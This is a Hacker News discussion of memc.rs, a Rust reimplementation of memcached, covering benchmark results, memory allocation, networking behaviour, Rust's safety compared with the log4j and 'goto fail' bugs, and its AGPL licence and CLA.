Drop-In Replacement for Memcached

Daily Digest email

Get the top HN stories in your inbox every day.

awestroke

This seems to be a concurrent hashmap (dashmap[1]) with a server speaking the memcached protocol. I know both memcached and redis use sophisticated strategies to reduce allocation calls and memory fragmentation, but this seems to do nothing like that.

[1]: https://docs.rs/dashmap/latest/dashmap/

saulrh

Honestly, still kind of impressive that an off-the-shelf concurrent hashmap can get within even a factor of two of the best-in-class hundreds-of-engineer-years piece of open-source software and all the fine-tuning that major enterprise users have contributed to it. Like, given how much infra budget goes into running big KV stores, I'd assume that memcached has been optimized to within an inch of its life across almost the entirety of its codebase, all the way up to the really hardcore stuff. Being able to just... grab a package and get within spitting distance of it is kind of amazing. IME when you do that you're lucky to get within two OOM.

AceJohnny2

I agree, but on the other hand you know the saying: "90% of the work takes 90% of the time, the 10% remaining takes the other 90% of the time."

How much effort would be required to get memc to equal or surpass memcached's performance? Would it require rewriting the datastructures from scratch? Fine-tuning or rewriting the tokio?

Aperocky

> factor of two of the best-in-class

Would be surprised if it didn't, and most of the time it should probably be even.

It's the edge cases that separates naive implementation from industrial usage. And off the shelf concurrent hashmaps are already pretty advanced.

CodesInChaos

> use sophisticated strategies to reduce allocation calls and memory fragmentation

Both of these are things a high quality allocator (jemalloc in this case) has to to optimize for as well (in this context "allocation calls" corresponds to syscalls). For example they also allocate different sizes from different buckets.

Applications do have some abilities an allocator does not have, for example:

* It can move allocations, since it can invalidate pointers. This allows defragmentation/compaction to happen

* It can try to predict how long lived an allocation will be

But it's not clear to me if any of these are important for performance.

rurban

Memcache uses an outdated and slow hash and hashtable. This is using jemalloc and a concurrent hashtable. Seems to be miles better.

tinktank

> Memcache uses an outdated and slow hash and hashtable.

No it doesn't. A cursory scan through the code will tell you as much.

rurban

Exactly why I told so. I even started to improve it some years ago, but got sidetracked. The only nice thing about the code are signals on htable updates. But a proper, fast concurrent hashtable would work wonders.

Lhiw

Not this again...

https://news.ycombinator.com/item?id=28833202

maxmcd

memc has a measuring performance section: https://github.com/memc-rs/memc-rs#measuring-performance

As an arbitrary example, on my machine if I run memtier_benchmark like so:

    memtier_benchmark --port=11211 --protocol=memcache_binary \
      -t 4 --ratio=1:1 --pipeline=9 -c 16 \
      -d 100 --key-pattern=S:S --key-minimum=1 \
      --key-maximum=1000000 -n allkeys

I get the following results:

    memc: 63999483 ops, 587092 ops/sec, 51.39MB/sec, avg 0.82 msec latency
    memcache: 63999936 ops, 2391777 ops/sec, 209.34MB/sec, avg 0.24 msec latency

memtier_benchmark also prints out more detailed stats, but I couldn't get those to work for memc. Not sure what's going on there.

If we set the set/get ratio to 1:10 (maybe more realistic), they get much closer:

    memc: 6399480 ops, 639989 ops/sec, 28.45MB/sec, avg 0.67 msec latency
    memcache: 6399623 ops, 1291566 ops/sec, 57.41MB/sec, avg 0.40 msec latency

injinj

A wireshark capture shows that memcrsd is breaking up the response packets, not optimizing network, sending a lot more packets than memcached. With the 100 byte size, memcached is packing 10 PDUs per packet and memcrsd is doing 1.

Using memtier_benchmark --pipeline=1 with "memcached -t 1" and "memcrsd -r 1" shows almost identical results (141943 vs 136550) on my machine (keys 1 -> 100000). The network is where most of the CPU is spent in both memcached and memcrsd cases.

I'm slightly impressed with memcrsd/rust scaling, 32 runtimes with 16 memtier_benchark threads with pipeline=9 can produce 4 million ops/sec. They need to fix the networking parts.

I think most will use horizontal scaling anyway, and simply shard the memcached's and skip the threading concurrency. Multiple memcached's with client side sharding is hard to beat.

nkuttler

Hm, would be nice if they had a comparison. More than just "it's Rust".

undefined

[deleted]

maxpert

Sometime back I did a Golang based memcache server implementation with BoltDB (experimented with Pebble as well). I dropped that implementation out of fear that nobody will be interested in using it, have same question here I guess. Why would I drop the existing battle tested solution for something that might still have non-memory bugs.

montroser

Cool, but what problem is this meant to solve? How does it compare to memcached in terms of performance?

StreamBright

The not yet rewritten in Rust problem.

rubyfan

you beat me to it!

mfrw

I am not among the ones who would blindly say 'rewrite it in rust', but given what happened with log4j, I would much rather choose a safe implementation given the memory safety provided by rust.

This also does not mean rust might not have its fair share of bugs; IMHO the probability is a little less.

Edit: I mentioned the log4j RCE as it was new & do not mean to imply that it would not have happened if we had a rust implementation. As the comments have mentioned, it would be the same in any language IMO

sorokod

You misunderstand the recent RCE in log4j. It has nothing to do with memory safety and can be implemented in Rust without any difficulty.

spullara

Further it wasn't even a bug. It was the well defined behavior working as specified.

staticassertion

> and can be implemented in Rust without any difficulty.

Not really. You'd have to fight the language and pull in some crates, to be sure. There's no native object serialization in rust and it's not really a concept in the language or ecosystem - except perhaps in the future with wasm runtimes.

There are numerous details of log4j that, in general, just don't apply to rust code.

edit: Since perhaps people don't believe me...

Rust has no equivalent of JNDI, pickle, etc. There is no way to send rust 'code' except, perhaps, wasm. Certainly there's no well supported way with decades of history of being ingrained into libraries, or patterns that support it.

tialaramex

I think it would actually be pretty tricky to do that in Rust without realising what you'd done, as seemingly happened to log4j.

The root of the log4j problem is a failure to distinguish between log format strings and the formatted log string, beyond that what happens is that Java allows a lot of flexibility at runtime which simply doesn't exist in Rust. In Java it's fine to, at runtime pull in classes you've never used before and run them, you can't do that in Rust - the types only existed at compile time. Indeed this is a key feature of Rust, because it means wrapper types are free at runtime, invaluable to the embedded firmware community who love type checking and other safety features but can't afford runtime overhead.

mfrw

I did not mean that the RCE of log4j is a memory safety issue, its just that, I would prefer to choose something where the probability of me having to wake up at the middle of the night and fix is less. Honestly, I would care less if it were memory safety or whatever, given I had to wake up at midnight :)

charcircuit

If log4j was implemented in Rust that feature would have never been implemented in the first place meaning th RCE wouldn't exist.

zamalek

> IMHO the probability is a little less.

Exactly, Rust simply eliminates a certain class of bugs. You can still make some really major mistakes in the absence of these bugs, e.g. "goto fail" could have easily been written in Rust.

vlmutolo

The "goto fail" bug isn't a great example; Rust actually does specifically guard against this by requiring curly braces around the body of "if".

Here's an explanation of "goto fail", which includes a code snippet.

https://nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-got...

If C conditionals required explicit braces around the body, the second fail would have been redundant code instead of a security vulnerability.

Additonally, Rust will warn you if you have "unreachable" code, such as all the code after the unconditional "goto fail". Though, I'm sure modern C compilers would also warn about this.

All that said, Rust definitely does have plenty of bug classes left for people to trip over. Integer under/overflows come to mind (though they're just logic errors instead of undefined behavior).

ordiel

Most certainly opening the door to a diffetent kind of bugs. This mentally of tying bugs to a language demonstrates a very poor understanding of the issues themselves, and if anything a large impacting bug demonstrates wide adoption of an individual piece, most probably choosen due to its stability or ease of use.

Remember heartbleed?...

harryf

I don't get it. Just starting with the three main benefits listed on the website, none of these are compelling...

> Safe: Implemented in Rust programming language and using Tokio runtime ensures memory and thread safety.

Does memcached have issues with memory and thread safety? I've never heard of them if it does.

> Fast: Can process thousands of requests with minimal overhead.

For a network cache you want _predictable_ performance more than "fast" performance, so that you're able to predict how a system will scale. "Fast" is among the top priorities for choosing a network cache implementation.

> Compatible: memc.rs is 100% compatible with memcached binary protocol. No need to rewrite your code. Just start a server and use your favorite language/framework.

What about tools for monitoring memcached in production? Does it support consistent hashing across a pool memcached servers?

Ultimately: why?

akx

Well yes, memcached has apparently had its share of memory-corruption vulnerabilities. https://www.cvedetails.com/vulnerability-list/vendor_id-1299...

aftbit

What can this do that memcached can't? We use memcached heavily in PROD but I would be hard pressed to replace it with an upstart competitor just because its is possible.

buro9

Memcache is a BSD licence.

This is AGPL or commercial.

The biggest difference I could find was not in the capability of it as a drop-in replacement but in the change of licence as any changes you might have to fit your needs now has different terms.

I guess the bet here is predicated on that... are companies running versions of memcached that are much improved and they're not sharing those improvements? Could this be a way to make those improvements public by this replacing memcached over time?

I'm not sure how they could do a commercial licence once they've accepted contributions, if they don't have a CLA granting the right over the contributions. But IANAL, etc.

adrr

Doesn’t matter the license. If I modified this code and didn’t distribute the code, I have 0 obligation to publish/share my changes. These are copyright licenses and license agreements. Distribution is the trigger for copyright licenses.

dodobirdlord

(Assuming we’re talking about US law) Since the previous comment was talking about commercial use, there’s no entitlement to use someone else’s code for commercial purposes at all absent some sort of license agreement (or waiver, or fair use, or some other exception). If the license granting the right to use the code in the first place requires sharing changes, then someone using the code with modifications has to either share the changes or infringe copyright.

CodeWriter23

> Could this be a way to make those improvements public by this replacing memcached over time?

Those who wish to share their contributions will, regardless of license. Those who do not, will stick to code with BSD-style licenses.

erk__

They do indeed have a CLA: https://cla-assistant.io/memc-rs/memc-rs

buro9

Ah, awesome. I did not see this mentioned in the contributing.md file (it may have been there, I just didn't notice it).

lumost

Biggest value prop seems to be that it's a single binary built off cargo, and that it's rust based. I wouldn't be surprised to see “single binary” become a selling point for container based shops even if all else is equal.

evanelias

AFAIK, memcached's only mandatory external dependency is libevent. And you can statically link that if you want.

galkk

Soon we'll see entire docker compose stack packed into single binary and everything will go back again

qaq

It's pretty convenient options for local dev. I am working on a project that has 7 services but they can be bundled into a single binary that has all 7 and NATS packaged in (plus you can spin up multiple instances of the services). Very convenient and builds in a few seconds.

aledalgrande

And after a few years, "modular architecture with dynamically linked libraries! lean binaries!"

mrweasel

Unless you're doing something very special, I'd guess that most container based solution will just get the memcached Docker image on Docker Hub. There's very little to be gained by building your own memcached image, with a "single binary" alternative.

keyle

     s/Drop-In Replacement/Rust partial reimplementation/

reyqn

Reading their github I was under the impression that it was an actual drop in replacement, their capability status passed all tests from memcapable. Am I missing something?

tayo42

it wont perform as well, memcached does a lot of its own memory management. this defers all the storage to a library. the eviction policy is also not the same. random eviction might catch some people off guard if your expecting what memcached does. it doesnt seem to support the ascii protocol either. didnt see anything similar to disk based storage or persistent storage memcached has now

nodesocket

Does memc.rs have the ability to do replication (master/slave)?

tommica

It's great that they made it, it's always good to have alternatives, and when they are made this well, it is just good for the ecosystem.

NaturalPhallacy

Ok. Why?

lopatin

Because Memcached wasn't written by the OP, but this library was.

Daily Digest email

Get the top HN stories in your inbox every day.